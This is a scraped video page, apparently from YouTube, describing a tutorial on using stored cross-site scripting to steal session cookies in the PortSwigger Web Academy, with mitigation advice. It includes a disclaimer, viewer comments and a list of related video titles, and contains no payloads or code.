How Hackers Use Stored Cross Site Scripting (XSS) to Steal Session Cookies (and how to mitigate it)

Показать описание

This video demonstration utilizes the Portswigger Web Academy (a free online training platform) to demonstrate how Cross Site Scripting can be used to steal session cookies from users who browse the vulnerable website. Watch until the end to learn how to protect yourself online from this attack, and what web developers should be doing to keep their site secured.

Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.

00:00 - Intro
00:15 - Identifying the Vulnerability
03:20 - Proof of Concept Payload
04:40 - Stealing Cookies
08:50 - Mitigation

👇 SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW 👇

Blog post mentioned in video:

Mitigation Resources:

___________________________________________
Social Media:

___________________________________________
Donations and Support:
Like my content? Please consider supporting me on Patreon:

Purchase a VPN Using my Affiliate Link

___________________________________________
Tags: #EthicalHacking #ComputerSecurity #XSS

Рекомендации по теме

Комментарии

Great explanation and example. Looking forward to more content like this from you!

funkykong

At this moment when I liked your video, the ratio is 100:1 (Like: Dislike). Enough to prove your great content. Keep us educating, buddy.

hackyourself

thanks alot i have read the blog and it was more than enaogh to forge an attack on my lab of corse but i have decided to watch the vid for the extras sauce and u were magnifisante please excuse my english and thanks

youssefblt

Wow! This was awesome! I’m having an issue receiving admin cookies for the eJPT XSS lab. Any other training websites you’d recommend aside from INE? You’re a great teacher! I’m subscribing!

losxlakers

I really enjoy it when you explain the remediation strategy for attacks on your videos. Well done!

cwinfosec

only tutorial in YouTube that teaches a-z. ✨

typex

This just helped me finish a challenge at HTB CTF, thanks dude.

NickerTheMighty

Really love the content man. Need more in the future.

abishekbaiju

looking this method xss without using burp collaborators...
than it solved now, thank

PawMeongs

great video! i am facing an error while getting cookie, instead of getting cookie im getting different thing like this "SL_G_WPT_TO=uz; SL_wptGlobTipTmp=undefined". i would be happy if you solve this my problem, what should i do?

pzerman

Very concise explanation that helped clear up a couple concepts for me. Thank you very much!!

xtwistedx

You are 💎. This is so simple and depth explanation. Thank you !!

balbeerkumar

I an a lay person. You talk about one cookie. Session cookie: is it only for one login into a particular website or is it all session cookies that exist in the browser at the given time?

D.von.N

Fantastic video! Thank you for the explanation.

camelotenglishtuition

But... How to do it if it bexomes text and not exexuted xode? 🤔

cr_cryptic

Hi. on the query strings part I don't see any session information. What may be the reason ? Please help It's for my school project :(

knntzmn

Does doing an xss require that the query section of any website have sent our query? I have to do an xss but in the query section of the site when completing with the data and pressing send nothing happens

matiasmunoz

Can you show how to mitigate stored xss attack using hybrid analysis approach?

geethakulal

Mind blowing! How can I, as a user, protect myself from this attack if a website I visit is vulnerable?

DogmaFight

Hey man. Not sure if you’re still on but nice work. I’m just learning XSS

laynehoon

How Hackers Use Stored Cross Site Scripting (XSS) to Steal Session Cookies (and how to mitigate it)

How Hackers Use Stored Cross Site Scripting (XSS) to Steal Session Cookies (and how to mitigate it)

Cross-Site Scripting (XSS) Explained And Demonstrated By A Pro Hacker!

Website Hacking Demos using Cross-Site Scripting (XSS) - it's just too easy!

What is Blind XSS & How Hackers Use it to Steal Your Browser Cookies?

Cross-Site Scripting (XSS) Explained And Demonstrated!

How Hackers Hijack Your Cookies? Use HttpOnly!

Ethical Hacking - Stored Cross-Site Scripting (XSS)

How hackers exploit XSS vulnerabilities to create admin accounts on your WordPress blog

Day 15: Cyber Security training - Web Application Security (part-2)

Stored Cross Site Scripting (XSS) #bugbounty #cybersecurity #hacking

Stored & Reflect XSS || Cross Site Script ing || Bug bounty || Chhota hacker

Stop hackers from injecting JavaScript into your webpage (Cross-Site Scripting XSS) #SecurityBites

Hacking Hackazon - stored XSS

19 Web Security How does Cross Site Scripting XSS Hacking work?

Cross-Site Request Forgery (CSRF) Explained And Demonstrated By A Pro Hacker!

Cross Site Scripting Explained | Types of XSS | Tools For XSS | How hackers use XSS | AR Network

Hacking demo: Cross-site scripting (XSS) and cloud services

Cross Site Scripting (XSS) explained in 60 seconds! #shorts #hacker

Cross Site Scripting with Burpsuite: HACKING ON LIVE WEBSITE! | XSS BUG BOUNTY

$200 Stored & Reflected XSS || Live Site || Bug bounty || Chhota hacker

Hacking - Intro to Cross Site Scripting (XSS)

Demystifying XSS Attacks #hacker #cybersecurity

Stored XSS - Ethical Hacking Club

Cross Site Scripting XSS | Web Hacking for Beginners #Hacker #WebHacking